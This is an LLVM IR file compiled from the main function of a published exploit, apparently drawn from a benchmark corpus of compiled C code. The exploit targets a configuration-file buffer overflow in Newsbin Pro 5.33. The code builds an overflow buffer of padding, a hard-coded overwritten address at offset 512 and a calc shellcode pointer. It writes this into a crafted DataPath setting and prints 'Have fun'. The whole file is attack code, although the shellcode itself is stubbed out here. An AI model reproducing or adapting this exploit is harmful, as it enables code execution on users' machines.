; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_3349.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_3349.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [74 x i8] c"[+] Newsbin Pro 5.33 Configuration file DataPath Buffer Overflow Exploit\0A\00", align 1
@.str.1 = private unnamed_addr constant [64 x i8] c"[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\0A\00", align 1
@calcshellcode = common dso_local global i8* null, align 8
@defaultfilename = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [3 x i8] c"wb\00", align 1
@.str.3 = private unnamed_addr constant [6 x i8] c"\B6\82\DBs\00\00", align 1
@.str.4 = private unnamed_addr constant [22 x i8] c"\0A[Settings]\0ADataPath=\00", align 1
@.str.5 = private unnamed_addr constant [2 x i8] c"\0A\00", align 1
@rest = common dso_local global i8* null, align 8
@.str.6 = private unnamed_addr constant [30 x i8] c"[+] File generated! Have fun\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32*, align 8
  %7 = alloca i8*, align 8
  %8 = alloca i8*, align 8
  %9 = alloca i8*, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %10 = call i32 @printf(i8* getelementptr inbounds ([74 x i8], [74 x i8]* @.str, i64 0, i64 0))
  %11 = call i32 @printf(i8* getelementptr inbounds ([64 x i8], [64 x i8]* @.str.1, i64 0, i64 0))
  %12 = load i8*, i8** @calcshellcode, align 8
  store i8* %12, i8** %9, align 8
  %13 = load i32, i32* @defaultfilename, align 4
  %14 = call i32* @fopen(i32 %13, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.2, i64 0, i64 0))
  store i32* %14, i32** %6, align 8
  %15 = call i64 @malloc(i32 520)
  %16 = inttoptr i64 %15 to i8*
  store i8* %16, i8** %7, align 8
  %17 = load i8*, i8** %7, align 8
  %18 = call i32 @memset(i8* %17, i8 signext 65, i32 520)
  %19 = load i8*, i8** %7, align 8
  %20 = getelementptr inbounds i8, i8* %19, i64 512
  %21 = call i32 @memcpy(i8* %20, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.3, i64 0, i64 0), i32 5)
  %22 = load i8*, i8** %7, align 8
  %23 = load i8*, i8** %9, align 8
  %24 = load i8*, i8** %9, align 8
  %25 = call i32 @strlen(i8* %24)
  %26 = call i32 @memcpy(i8* %22, i8* %23, i32 %25)
  %27 = load i32*, i32** %6, align 8
  %28 = call i32 @fprintf(i32* %27, i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.4, i64 0, i64 0))
  %29 = load i32*, i32** %6, align 8
  %30 = load i8*, i8** %7, align 8
  %31 = call i32 @fprintf(i32* %29, i8* %30)
  %32 = load i32*, i32** %6, align 8
  %33 = call i32 @fprintf(i32* %32, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.5, i64 0, i64 0))
  %34 = load i32*, i32** %6, align 8
  %35 = load i8*, i8** @rest, align 8
  %36 = call i32 @fprintf(i32* %34, i8* %35)
  %37 = load i32*, i32** %6, align 8
  %38 = call i32 @fclose(i32* %37)
  %39 = call i32 @printf(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.6, i64 0, i64 0))
  ret i32 0
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32* @fopen(i32, i8*) #1

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local i32 @memcpy(i8*, i8*, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @fprintf(i32*, i8*) #1

declare dso_local i32 @fclose(i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
